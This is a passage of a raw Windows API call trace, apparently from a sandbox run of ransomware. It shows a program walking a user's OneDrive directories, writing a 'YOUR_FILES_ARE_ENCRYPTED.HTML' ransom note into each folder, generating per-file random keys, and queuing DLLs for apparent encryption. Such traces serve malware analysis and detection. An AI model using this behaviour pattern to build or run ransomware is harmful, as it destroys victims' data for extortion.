lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\*" [0113.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed466d7c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xed466d7c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xef0be497, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0113.705] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed466d7c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xed466d7c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xef0be497, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.705] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef0be497, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xef0be497, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xef8f0a82, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.705] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.705] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.705] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.705] lstrlenW (lpString=".mui") returned 4 [0113.705] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.705] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef0be497, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xef0be497, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xef8f0a82, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.705] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0113.705] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.705] GetProcessHeap () returned 0x600000 [0113.705] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\mr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.706] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.707] CloseHandle (hObject=0x310) returned 1 [0113.707] GetProcessHeap () returned 0x600000 [0113.707] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.707] GetProcessHeap () returned 0x600000 [0113.707] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.707] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeffa519c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xeffa519c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xeffa519c, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ms", cAlternateFileName="")) returned 1 [0113.707] StrStrIW (lpFirst="ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.707] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms") returned 78 [0113.707] GetProcessHeap () returned 0x600000 [0113.707] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.707] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms" [0113.707] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\*" [0113.707] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeffa519c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xeffa519c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0502516, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.707] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeffa519c, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xeffa519c, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0502516, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="..", cAlternateFileName="")) returned 1 [0113.707] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0502516, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0502516, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0764d71, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.707] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.707] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.707] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.707] lstrlenW (lpString=".mui") returned 4 [0113.707] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.707] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0502516, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0502516, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0764d71, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc1768cb, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.707] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.708] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.708] GetProcessHeap () returned 0x600000 [0113.708] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.708] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.709] CloseHandle (hObject=0x310) returned 1 [0113.709] GetProcessHeap () returned 0x600000 [0113.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.709] GetProcessHeap () returned 0x600000 [0113.709] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.709] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b23a97, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6b23a97, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9af8e3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x6f2a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0113.709] StrStrIW (lpFirst="msvcp120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.709] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll") returned 88 [0113.709] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.709] lstrlenW (lpString=".dll") returned 4 [0113.709] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0113.709] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcp120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.710] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=455328) returned 1 [0113.710] GetProcessHeap () returned 0x600000 [0113.710] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.736] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="83") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A0") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="DA") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="23") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="37") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BF") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="E3") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="09") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="56") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="CA") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A5") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="58") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="74") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="50") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="77") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="D0") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="DF") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="CB") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="1A") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="97") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="77") returned 2 [0113.736] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="EB") returned 2 [0113.736] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="24") returned 2 [0113.736] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="90") returned 2 [0113.736] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AC") returned 2 [0113.736] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="DD") returned 2 [0113.736] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="AF") returned 2 [0113.736] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="0B") returned 2 [0113.736] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="D9") returned 2 [0113.736] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="F0") returned 2 [0113.736] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="89") returned 2 [0113.736] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1C") returned 2 [0113.737] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcp120.dll" [0113.737] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.737] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.737] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2aa39d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xb2aa39d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xc8b7ea2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0xed0a0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0113.737] StrStrIW (lpFirst="msvcr120.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.737] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll") returned 88 [0113.737] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.737] lstrlenW (lpString=".dll") returned 4 [0113.737] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0113.737] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\msvcr120.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0113.738] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=970912) returned 1 [0113.738] GetProcessHeap () returned 0x600000 [0113.738] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.741] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="25") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="BA") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="08") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="0F") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="D4") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="AA") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="BF") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A4") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="F2") returned 2 [0113.741] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="27") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="24") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="BE") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="6D") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="18") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="5E") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A5") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="73") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="4B") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="67") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AD") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="03") returned 2 [0113.742] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="2F") returned 2 [0113.742] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="45") returned 2 [0113.742] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D6") returned 2 [0113.742] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="5C") returned 2 [0113.742] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="AE") returned 2 [0113.742] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="EE") returned 2 [0113.742] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="43") returned 2 [0113.742] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="8B") returned 2 [0113.742] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="06") returned 2 [0113.742] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="24") returned 2 [0113.742] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="73") returned 2 [0113.743] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\msvcr120.dll" [0113.743] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.743] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.743] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0823ae2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0823ae2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0823ae2, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="mt-mt", cAlternateFileName="")) returned 1 [0113.743] StrStrIW (lpFirst="mt-mt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.743] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt") returned 81 [0113.743] GetProcessHeap () returned 0x600000 [0113.743] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.743] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt" [0113.743] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\*" [0113.744] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\mt-mt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0823ae2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0823ae2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0aabfbc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.744] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0823ae2, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0823ae2, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0aabfbc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="..", cAlternateFileName="")) returned 1 [0113.744] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0aabfbc, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xf0aabfbc, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xf0e3f813, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x1ad96cd, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.744] StrStrIW 